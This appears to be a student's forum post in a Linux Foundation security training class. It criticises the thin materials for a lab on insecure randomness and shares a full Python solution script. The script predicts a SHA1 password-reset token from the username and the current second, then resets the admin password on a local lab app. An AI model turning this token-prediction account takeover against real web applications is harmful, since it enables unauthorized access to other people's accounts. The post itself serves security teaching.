Skip to content
    • Welcome to the Linux Foundation Forum!

    Lack of Resources for Lab 4.1 - Insecure Randomness in Web Applications

    Posts: 1
    in SKF100 Class Forum

    Hello everyone,

    I've been working on Lab 4.1, which involves exploiting weak randomization in a password reset function. However, the provided resources are insufficient for completing the lab effectively.

    • No guidance on interacting with the web application endpoints to exploit the vulnerability.
    • The provided solution uses a static datetime, not reflecting the dynamic nature of the actual application.

    To help others, here’s a script that completes the lab, with added print statements for clarity:

    1. import requests
    2. import hashlib
    3. import datetime
    4. import time
    5.  
    6. base_url = 'http://localhost:5000'
    7.  
    8. # Step 1: Trigger the forget password functionality
    9. forget_password_url = f'{base_url}/passwordForget'
    10. admin_username = 'admin'
    11. print(f"[INFO] Initiating password reset for user '{admin_username}'...")
    12. response = requests.post(forget_password_url, data={'username': admin_username})
    13.  
    14. if response.status_code == 200:
    15.     print("[INFO] Password reset request sent successfully.")
    16. else:
    17.     print("[ERROR] Failed to send password reset request.")
    18.     exit()
    19.  
    20. # Step 2: Wait a second to ensure the timestamp is accurate
    21. time.sleep(1)
    22.  
    23. # Calculate the reset token
    24. current_time = datetime.datetime.now()
    25. timestamp = current_time.second
    26. to_hash = admin_username + str(timestamp)
    27. reset_token = hashlib.sha1(to_hash.encode('utf-8')).hexdigest()
    28.  
    29. print(f"[INFO] Calculated reset token: {reset_token}")
    30.  
    31. # Step 3: Use the reset token to reset the admin's password
    32. reset_password_url = f'{base_url}/reset'
    33. new_password = 'password1'
    34. print(f"[INFO] Sending password reset request with token '{reset_token}' and new password '{new_password}'...")
    35. response = requests.post(reset_password_url, data={
    36.     'resetToken': reset_token,
    37.     'username': admin_username,
    38.     'password': new_password
    39. })
    40.  
    41. if response.status_code == 200:
    42.     print(f"[SUCCESS] Password for user '{admin_username}' has been reset to '{new_password}'.")
    43. else:
    44.     print(f"[ERROR] Failed to reset the password. Server responded with status code {response.status_code}.")

    Comments

    Welcome!

    It looks like you're new here. Sign in or register to get started.
    Sign In

    Welcome!

    It looks like you're new here. Sign in or register to get started.
    Sign In

    Quick Links

    Categories

    Upcoming Training